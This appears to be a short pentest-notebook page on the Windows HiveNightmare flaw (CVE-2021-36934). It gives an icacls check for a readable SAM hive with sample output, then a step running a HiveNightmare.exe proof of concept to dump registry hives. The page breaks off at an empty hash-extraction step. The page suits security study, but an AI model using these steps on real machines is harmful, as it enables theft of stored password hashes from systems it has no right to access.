CVE-2021-36934 HiveNightmare

1 - Check if target is vulnerable

C:\hacker> icacls c:\Windows\System32\config\SAM

C:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

We are vulnerable since the file is readable by BUILTIN\Users

circle-info

Successful exploitation also requires the presence of one or more shadow copies (snaphsots). Most Windows 10 systems have System Protection enabled by default which creates shadow copies.

2 - Dump Registry Hives

This PoCarrow-up-right can be used:

.\HiveNightmare.exe

3 - Extract Hashes from dump

From a linux host:

Last updated